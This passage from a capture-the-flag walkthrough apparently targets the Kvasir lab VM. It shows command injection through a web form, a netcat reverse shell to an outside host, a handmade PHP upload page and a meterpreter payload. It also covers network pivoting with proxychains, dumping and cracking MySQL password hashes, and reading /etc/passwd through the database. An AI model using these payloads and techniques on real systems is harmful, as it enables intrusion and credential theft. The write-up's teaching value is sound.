</span><span class='line'><span class="k">print</span> <span class="nv">$res</span><span class="o">-&gt;</span><span class="n">as_string</span><span class="p">();</span>
</span></code></pre></td></tr></table></div></figure>


<p>Now I can pass in whatever I want to send through the <code>admin.php</code> page as a command line argument to the script.</p>

<p>Initially I tried <code>./send_form.pl "apache2; id"</code>, but it didn&rsquo;t work, let&rsquo;s try a variation of it with <code>#</code> at the end.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ./send_form.pl "apache2; id #"
</span><span class='line'>HTTP/1.1 302 Found
</span><span class='line'>Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
</span><span class='line'>Connection: close
</span><span class='line'>Date: Tue, 04 Nov 2014 19:46:00 GMT
</span><span class='line'>Pragma: no-cache
</span><span class='line'>Location: index.php
</span><span class='line'>Server: Apache/2.2.22 (Debian)
</span><span class='line'>Vary: Accept-Encoding
</span><span class='line'>Content-Length: 546
</span><span class='line'>Content-Type: text/html
</span><span class='line'>Expires: Thu, 19 Nov 1981 08:52:00 GMT
</span><span class='line'>Client-Date: Wed, 05 Nov 2014 09:40:50 GMT
</span><span class='line'>Client-Peer: 172.16.246.134:80
</span><span class='line'>Client-Response-Num: 1
</span><span class='line'>Set-Cookie: PHPSESSID=vsur3uar3fopv27r8rtfk5dmd2; path=/
</span><span class='line'>X-Powered-By: PHP/5.4.4-14+deb7u11
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>&lt;html>
</span><span class='line'>&lt;body>
</span><span class='line'>&lt;div align="center">
</span><span class='line'>
</span><span class='line'>&lt;h1>Service Check&lt;/h1>
</span><span class='line'>
</span><span class='line'>&lt;form name="service" method="post" action="">
</span><span class='line'>&lt;input name="service" id="service" type="text" placeholder="apache2" />&lt;br />&lt;br />
</span><span class='line'>&lt;input name="submit" id="submit" type="submit" value="Submit" />
</span><span class='line'>&lt;/form>
</span><span class='line'>
</span><span class='line'>&lt;form action="logout.php" method="post">
</span><span class='line'>&lt;input type="submit" value="Logout" />
</span><span class='line'>&lt;/form>
</span><span class='line'>
</span><span class='line'>&lt;pre>Usage: /etc/init.d/apache2 {start|stop|graceful-stop|restart|reload|force-reload|start-htcacheclean|stop-htcacheclean|status}.
</span><span class='line'>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</span><span class='line'>&lt;/pre></span></code></pre></td></tr></table></div></figure>


<p>Awesome, confirmed command injection! Conviniently, there&rsquo;s <code>netcat</code> available as well, so let&rsquo;s take advantage of it!</p>

<p>Set up listener locally.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc -l -p 31337</span></code></pre></td></tr></table></div></figure>


<p>And use the command injection vulnerability to connect back with a shell.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# ./send_form.pl "apache2; netcat -e /bin/bash 172.16.246.129 31337"</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc -l -p 31337
</span><span class='line'>id
</span><span class='line'>uid=33(www-data) gid=33(www-data) groups=33(www-data)</span></code></pre></td></tr></table></div></figure>


<p>Woohoo, we&rsquo;re in!</p>

<h2>MySQL and enabling UDF</h2>

<p>Doing a bit of a recon on the box, we can quickly find out by looking at the <code>submit.php</code> file that there&rsquo;s a MySQL database listening on 192.168.2.200 with credentials <code>webapp:webapp</code>.</p>

<p>Okay, looks like this host is dual-homed! We&rsquo;ll need to jump on 192.168.2.0 subnet (and eventually, further). Also, we have non-TTY shell, so it&rsquo;s a bit of a pain&hellip;</p>

<p>To overcome this, I came up with an idea to use <code>metasploit</code> pivoting capability, SOCKS proxy server and <code>proxychains</code> to connect to MySQL database directly from my host.</p>

<p>First, I need to generate and get metasploit payload on the server, but how? I came up with another idea&hellip; but thinking about it now, there are probably number of other, better and easier methods. Oh well, that&rsquo;s the first one I went ahead with, so I&rsquo;ll stick to it with this writeup.</p>

<p>I&rsquo;ll create a new php upload page and get my files on that server this way!</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>echo "&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;&lt;form action=upload.php method=post enctype=multipart/form-data&gt;&lt;input type=file name=uploadFile&gt;&lt;br&gt;&lt;input type=submit value=Upload File&gt;&lt;/form&gt;" &gt; upload.php
</span><span class='line'>echo "&lt;?php" &gt;&gt; upload.php
</span><span class='line'>echo "\$target_dir = \"uploads/\";" &gt;&gt; upload.php
</span><span class='line'>echo "\$target_dir = \$target_dir . basename( \$_FILES[\"uploadFile\"][\"name\"]);" &gt;&gt; upload.php
</span><span class='line'>echo "if (move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$target_dir)) {" &gt;&gt; upload.php
</span><span class='line'>echo "echo \"The file \". basename( \$_FILES[\"uploadFile\"][\"name\"]). \" has been uploaded.\";" &gt;&gt; upload.php
</span><span class='line'>echo "} else {" &gt;&gt; upload.php
</span><span class='line'>echo "echo \"Sorry, there was an error uploading your file.\";" &gt;&gt; upload.php
</span><span class='line'>echo "}?&gt;&lt;/body&gt;&lt;/html&gt;" &gt;&gt; upload.php</span></code></pre></td></tr></table></div></figure>


<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/upload.png" title="Upload" alt="Upload" /></p>

<p>Generate metasploit payload and upload it to the server using newly created page.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msf &gt; use payload/linux/x86/meterpreter/reverse_tcp 
</span><span class='line'>msf payload(reverse_tcp) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (payload/linux/x86/meterpreter/reverse_tcp):
</span><span class='line'>
</span><span class='line'>   Name          Current Setting  Required  Description
</span><span class='line'>   ----          ---------------  --------  -----------
</span><span class='line'>   DebugOptions  0                no        Debugging options for POSIX meterpreter
</span><span class='line'>   LHOST                          yes       The listen address
</span><span class='line'>   LPORT         4444             yes       The listen port
</span><span class='line'>
</span><span class='line'>msf payload(reverse_tcp) &gt; set LHOST 172.16.246.129
</span><span class='line'>LHOST =&gt; 172.16.246.129
</span><span class='line'>msf payload(reverse_tcp) &gt; generate -t elf -f exploit
</span><span class='line'>[*] Writing 155 bytes to exploit...</span></code></pre></td></tr></table></div></figure>


<p>Set-up metasploit multi handler and run the exploit.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msf &gt; use exploit/multi/handler 
</span><span class='line'>msf exploit(handler) &gt; set PAYLOAD linux/x86/meterpreter/reverse_tcp 
</span><span class='line'>PAYLOAD =&gt; linux/x86/meterpreter/reverse_tcp
</span><span class='line'>msf exploit(handler) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (exploit/multi/handler):
</span><span class='line'>
</span><span class='line'>   Name  Current Setting  Required  Description
</span><span class='line'>   ----  ---------------  --------  -----------
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>Payload options (linux/x86/meterpreter/reverse_tcp):
</span><span class='line'>
</span><span class='line'>   Name          Current Setting  Required  Description
</span><span class='line'>   ----          ---------------  --------  -----------
</span><span class='line'>   DebugOptions  0                no        Debugging options for POSIX meterpreter
</span><span class='line'>   LHOST         172.16.246.129   yes       The listen address
</span><span class='line'>   LPORT         4444             yes       The listen port
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>Exploit target:
</span><span class='line'>
</span><span class='line'>   Id  Name
</span><span class='line'>   --  ----
</span><span class='line'>   0   Wildcard Target
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>msf exploit(handler) &gt; exploit -j
</span><span class='line'>[*] Exploit running as background job.
</span><span class='line'>
</span><span class='line'>[*] Started reverse handler on 172.16.246.129:4444 
</span><span class='line'>[*] Starting the payload handler...</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# nc -l -p 31337
</span><span class='line'>ls
</span><span class='line'>admin.php
</span><span class='line'>index.php
</span><span class='line'>login.php
</span><span class='line'>logout.php
</span><span class='line'>member.php
</span><span class='line'>register.php
</span><span class='line'>submit.php
</span><span class='line'>upload.php
</span><span class='line'>uploads
</span><span class='line'>
</span><span class='line'>
</span><span class='line'>cd uploads
</span><span class='line'>./exploit &</span></code></pre></td></tr></table></div></figure>




<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msf exploit(handler) &gt; [*] Transmitting intermediate stager for over-sized stage...(100 bytes)
</span><span class='line'>[*] Sending stage (1138688 bytes) to 172.16.246.134
</span><span class='line'>[*] Meterpreter session 5 opened (172.16.246.129:4444 -&gt; 172.16.246.134:55877) at 2014-11-05 21:24:03 +1100</span></code></pre></td></tr></table></div></figure>


<p>Woop, woop, we got meterpreter shell! <a href="http://i.imgur.com/hV9YDNn.gif">Meterpreter dance</a></p>

<p>Let&rsquo;s configure a pivot and start socks server in metasploit and configure proxychains.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>msf exploit(handler) &gt; route add 192.168.2.0 255.255.255.0 5
</span><span class='line'>[*] Route added
</span><span class='line'>msf exploit(handler) &gt; route print
</span><span class='line'>
</span><span class='line'>Active Routing Table
</span><span class='line'>====================
</span><span class='line'>
</span><span class='line'>   Subnet             Netmask            Gateway
</span><span class='line'>   ------             -------            -------
</span><span class='line'>   192.168.2.0        255.255.255.0      Session 5
</span><span class='line'>
</span><span class='line'>msf exploit(handler) &gt; back
</span><span class='line'>msf &gt; use auxiliary/server/socks
</span><span class='line'>use auxiliary/server/socks4a    use auxiliary/server/socks_unc
</span><span class='line'>msf &gt; use auxiliary/server/socks4a 
</span><span class='line'>msf auxiliary(socks4a) &gt; show options
</span><span class='line'>
</span><span class='line'>Module options (auxiliary/server/socks4a):
</span><span class='line'>
</span><span class='line'>   Name     Current Setting  Required  Description
</span><span class='line'>   ----     ---------------  --------  -----------
</span><span class='line'>   SRVHOST  0.0.0.0          yes       The address to listen on
</span><span class='line'>   SRVPORT  1080             yes       The port to listen on.
</span><span class='line'>
</span><span class='line'>msf auxiliary(socks4a) &gt; run
</span><span class='line'>[*] Auxiliary module execution completed
</span><span class='line'>
</span><span class='line'>[*] Starting the socks4a proxy server
</span><span class='line'>[*] Stopping the socks4a proxy server
</span><span class='line'>msf auxiliary(socks4a) &gt; jobs</span></code></pre></td></tr></table></div></figure>


<p>Make sure to add the following lines in <code>/etc/proxychains.conf</code></p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># MetaSploit
</span><span class='line'>socks4 127.0.0.1 1080</span></code></pre></td></tr></table></div></figure>


<p>Now we can run any command on our local Kali with <code>proxychains</code> in front of it and it&rsquo;ll talk directly to anything on 192.168.2.0 subnet!</p>

<p>Let&rsquo;s connect to the MySQL server and loot as much as we can.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
<span class='line-number'>36</span>
<span class='line-number'>37</span>
<span class='line-number'>38</span>
<span class='line-number'>39</span>
<span class='line-number'>40</span>
<span class='line-number'>41</span>
<span class='line-number'>42</span>
<span class='line-number'>43</span>
<span class='line-number'>44</span>
<span class='line-number'>45</span>
<span class='line-number'>46</span>
<span class='line-number'>47</span>
<span class='line-number'>48</span>
<span class='line-number'>49</span>
<span class='line-number'>50</span>
<span class='line-number'>51</span>
<span class='line-number'>52</span>
<span class='line-number'>53</span>
<span class='line-number'>54</span>
<span class='line-number'>55</span>
<span class='line-number'>56</span>
<span class='line-number'>57</span>
<span class='line-number'>58</span>
<span class='line-number'>59</span>
<span class='line-number'>60</span>
<span class='line-number'>61</span>
<span class='line-number'>62</span>
<span class='line-number'>63</span>
<span class='line-number'>64</span>
<span class='line-number'>65</span>
<span class='line-number'>66</span>
<span class='line-number'>67</span>
<span class='line-number'>68</span>
<span class='line-number'>69</span>
<span class='line-number'>70</span>
<span class='line-number'>71</span>
<span class='line-number'>72</span>
<span class='line-number'>73</span>
<span class='line-number'>74</span>
<span class='line-number'>75</span>
<span class='line-number'>76</span>
<span class='line-number'>77</span>
<span class='line-number'>78</span>
<span class='line-number'>79</span>
<span class='line-number'>80</span>
<span class='line-number'>81</span>
<span class='line-number'>82</span>
<span class='line-number'>83</span>
<span class='line-number'>84</span>
<span class='line-number'>85</span>
<span class='line-number'>86</span>
<span class='line-number'>87</span>
<span class='line-number'>88</span>
<span class='line-number'>89</span>
<span class='line-number'>90</span>
<span class='line-number'>91</span>
<span class='line-number'>92</span>
<span class='line-number'>93</span>
<span class='line-number'>94</span>
<span class='line-number'>95</span>
<span class='line-number'>96</span>
<span class='line-number'>97</span>
<span class='line-number'>98</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# proxychains mysql -h 192.168.2.200 -u webapp -p
</span><span class='line'>ProxyChains-3.1 (http://proxychains.sf.net)
</span><span class='line'>Enter password: 
</span><span class='line'>|S-chain|-&lt;&gt;-127.0.0.1:1080-&lt;&gt;&lt;&gt;-192.168.2.200:3306-&lt;&gt;&lt;&gt;-OK
</span><span class='line'>Welcome to the MySQL monitor.  Commands end with ; or \g.
</span><span class='line'>Your MySQL connection id is 67
</span><span class='line'>Server version: 5.5.37-0+wheezy1 (Debian)
</span><span class='line'>
</span><span class='line'>Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
</span><span class='line'>
</span><span class='line'>Oracle is a registered trademark of Oracle Corporation and/or its
</span><span class='line'>affiliates. Other names may be trademarks of their respective
</span><span class='line'>owners.
</span><span class='line'>
</span><span class='line'>Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
</span><span class='line'>
</span><span class='line'>mysql&gt; show databases;
</span><span class='line'>+--------------------+
</span><span class='line'>| Database           |
</span><span class='line'>+--------------------+
</span><span class='line'>| information_schema |
</span><span class='line'>| mysql              |
</span><span class='line'>| performance_schema |
</span><span class='line'>| webapp             |
</span><span class='line'>+--------------------+
</span><span class='line'>4 rows in set (0.09 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; use mysql;
</span><span class='line'>Reading table information for completion of table and column names
</span><span class='line'>You can turn off this feature to get a quicker startup with -A
</span><span class='line'>
</span><span class='line'>Database changed
</span><span class='line'>mysql&gt; show tables;
</span><span class='line'>+---------------------------+
</span><span class='line'>| Tables_in_mysql           |
</span><span class='line'>+---------------------------+
</span><span class='line'>| columns_priv              |
</span><span class='line'>| db                        |
</span><span class='line'>| event                     |
</span><span class='line'>| func                      |
</span><span class='line'>| general_log               |
</span><span class='line'>| help_category             |
</span><span class='line'>| help_keyword              |
</span><span class='line'>| help_relation             |
</span><span class='line'>| help_topic                |
</span><span class='line'>| host                      |
</span><span class='line'>| ndb_binlog_index          |
</span><span class='line'>| plugin                    |
</span><span class='line'>| proc                      |
</span><span class='line'>| procs_priv                |
</span><span class='line'>| proxies_priv              |
</span><span class='line'>| servers                   |
</span><span class='line'>| slow_log                  |
</span><span class='line'>| tables_priv               |
</span><span class='line'>| time_zone                 |
</span><span class='line'>| time_zone_leap_second     |
</span><span class='line'>| time_zone_name            |
</span><span class='line'>| time_zone_transition      |
</span><span class='line'>| time_zone_transition_type |
</span><span class='line'>| user                      |
</span><span class='line'>+---------------------------+
</span><span class='line'>24 rows in set (0.01 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; select User, Password from user;
</span><span class='line'>+------------------+-------------------------------------------+
</span><span class='line'>| User             | Password                                  |
</span><span class='line'>+------------------+-------------------------------------------+
</span><span class='line'>| root             | *ECB01D78C2FBEE997EDA584C647183FD99C115FD |
</span><span class='line'>| root             | *ECB01D78C2FBEE997EDA584C647183FD99C115FD |
</span><span class='line'>| root             | *ECB01D78C2FBEE997EDA584C647183FD99C115FD |
</span><span class='line'>| root             | *ECB01D78C2FBEE997EDA584C647183FD99C115FD |
</span><span class='line'>| debian-sys-maint | *E0E0871376896664A590151D348CCE9AA800435B |
</span><span class='line'>| webapp           | *BF7C27E734F86F28A9386E9759D238AFB863BDE3 |
</span><span class='line'>| root             | *ECB01D78C2FBEE997EDA584C647183FD99C115FD |
</span><span class='line'>+------------------+-------------------------------------------+
</span><span class='line'>7 rows in set (0.01 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; use webapp;
</span><span class='line'>Reading table information for completion of table and column names
</span><span class='line'>You can turn off this feature to get a quicker startup with -A
</span><span class='line'>
</span><span class='line'>Database changed
</span><span class='line'>mysql&gt; show tables;
</span><span class='line'>+------------------+
</span><span class='line'>| Tables_in_webapp |
</span><span class='line'>+------------------+
</span><span class='line'>| todo             |
</span><span class='line'>| users            |
</span><span class='line'>+------------------+
</span><span class='line'>2 rows in set (0.06 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; select * from todo;
</span><span class='line'>+----------------------------+
</span><span class='line'>| task                       |
</span><span class='line'>+----------------------------+
</span><span class='line'>| stop running mysql as root |
</span><span class='line'>+----------------------------+
</span><span class='line'>1 row in set (0.04 sec)</span></code></pre></td></tr></table></div></figure>


<p>Some useful piece of information. We have database running as root user on the server and we looted root password to the database that we cracked via <a href="https://crackstation.net/">CrackStation</a>.</p>

<p><img src="http://blog.knapsy.com/images/posts/2014-11-05-kvasir-vm-writeup/crackstation.png" title="Crack Station" alt="CrackStation" /></p>

<p>Let&rsquo;s log-in with <code>root:coolwater</code> and see how we can break out to system shell.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>root@kali:~# proxychains mysql -h 192.168.2.200 -u root -p
</span><span class='line'>ProxyChains-3.1 (http://proxychains.sf.net)
</span><span class='line'>Enter password: 
</span><span class='line'>|S-chain|-&lt;&gt;-127.0.0.1:1080-&lt;&gt;&lt;&gt;-192.168.2.200:3306-&lt;&gt;&lt;&gt;-OK
</span><span class='line'>Welcome to the MySQL monitor.  Commands end with ; or \g.
</span><span class='line'>Your MySQL connection id is 68
</span><span class='line'>Server version: 5.5.37-0+wheezy1 (Debian)
</span><span class='line'>
</span><span class='line'>Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved.
</span><span class='line'>
</span><span class='line'>Oracle is a registered trademark of Oracle Corporation and/or its
</span><span class='line'>affiliates. Other names may be trademarks of their respective
</span><span class='line'>owners.
</span><span class='line'>
</span><span class='line'>Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
</span><span class='line'>
</span><span class='line'>mysql&gt; use webapp
</span><span class='line'>Reading table information for completion of table and column names
</span><span class='line'>You can turn off this feature to get a quicker startup with -A
</span><span class='line'>
</span><span class='line'>Database changed</span></code></pre></td></tr></table></div></figure>


<p>There are couple cool things that we can do:</p>

<ul>
<li>reading any file on the system</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
<span class='line-number'>28</span>
<span class='line-number'>29</span>
<span class='line-number'>30</span>
<span class='line-number'>31</span>
<span class='line-number'>32</span>
<span class='line-number'>33</span>
<span class='line-number'>34</span>
<span class='line-number'>35</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; create table pwn(test text);
</span><span class='line'>Query OK, 0 rows affected (0.04 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; load data infile '/etc/passwd' into table pwn;
</span><span class='line'>Query OK, 22 rows affected (0.01 sec)
</span><span class='line'>Records: 22  Deleted: 0  Skipped: 0  Warnings: 0
</span><span class='line'>
</span><span class='line'>mysql&gt; select * from pwn;
</span><span class='line'>+-------------------------------------------------------------------------+
</span><span class='line'>| test                                                                    |
</span><span class='line'>+-------------------------------------------------------------------------+
</span><span class='line'>| root:x:0:0:root:/root:/bin/bash                                         |
</span><span class='line'>| daemon:x:1:1:daemon:/usr/sbin:/bin/sh                                   |
</span><span class='line'>| bin:x:2:2:bin:/bin:/bin/sh                                              |
</span><span class='line'>| sys:x:3:3:sys:/dev:/bin/sh                                              |
</span><span class='line'>| sync:x:4:65534:sync:/bin:/bin/sync                                      |
</span><span class='line'>| games:x:5:60:games:/usr/games:/bin/sh                                   |
</span><span class='line'>| man:x:6:12:man:/var/cache/man:/bin/sh                                   |
</span><span class='line'>| lp:x:7:7:lp:/var/spool/lpd:/bin/sh                                      |
</span><span class='line'>| mail:x:8:8:mail:/var/mail:/bin/sh                                       |
</span><span class='line'>| news:x:9:9:news:/var/spool/news:/bin/sh                                 |
</span><span class='line'>| uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh                               |
</span><span class='line'>| proxy:x:13:13:proxy:/bin:/bin/sh                                        |
</span><span class='line'>| www-data:x:33:33:www-data:/var/www:/bin/sh                              |
</span><span class='line'>| backup:x:34:34:backup:/var/backups:/bin/sh                              |
</span><span class='line'>| list:x:38:38:Mailing List Manager:/var/list:/bin/sh                     |
</span><span class='line'>| irc:x:39:39:ircd:/var/run/ircd:/bin/sh                                  |
</span><span class='line'>| gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh |
</span><span class='line'>| nobody:x:65534:65534:nobody:/nonexistent:/bin/sh                        |
</span><span class='line'>| libuuid:x:100:101::/var/lib/libuuid:/bin/sh                             |
</span><span class='line'>| sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin                       |
</span><span class='line'>| mysql:x:102:103:MySQL Server,,,:/nonexistent:/bin/false                 |
</span><span class='line'>| ftpuser:x:1000:1000::/dev/null:/etc/                                    |
</span><span class='line'>+-------------------------------------------------------------------------+
</span><span class='line'>22 rows in set (0.02 sec)
</span></code></pre></td></tr></table></div></figure>


<ul>
<li>create a file on the system (as long as it doesn&rsquo;t exist yet, you can&rsquo;t modify/write to existing files)</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>mysql&gt; insert into pwn(test) values("here is some text");
</span><span class='line'>Query OK, 1 row affected (0.07 sec)
</span><span class='line'>
</span><span class='line'>mysql&gt; select * from pwn into dumpfile '/tmp/pwn';
</span><span class='line'>Query OK, 0 rows affected (0.10 sec)</span></code></pre></td></tr></table></div></figure>


<p>However, this doesn&rsquo;t give us much, no interesting files to read and I tried creating SSH keys, however, MySQL sets permissions of files it creates to 660, which is not restrictive enough for SSH keys to work.</p>

<p>Last resort - UDF functions! But&hellip; there&rsquo;s a problem, it&rsquo;s not installed! But that&rsquo;s OK, there&rsquo;s a trick to install it ourselves.</p>

<p>Couple things we&rsquo;ll need to do:</p>

<ul>
<li>define base64 decoding functions (we need to somehow get actual libraries over onto the server)</li>
</ul>


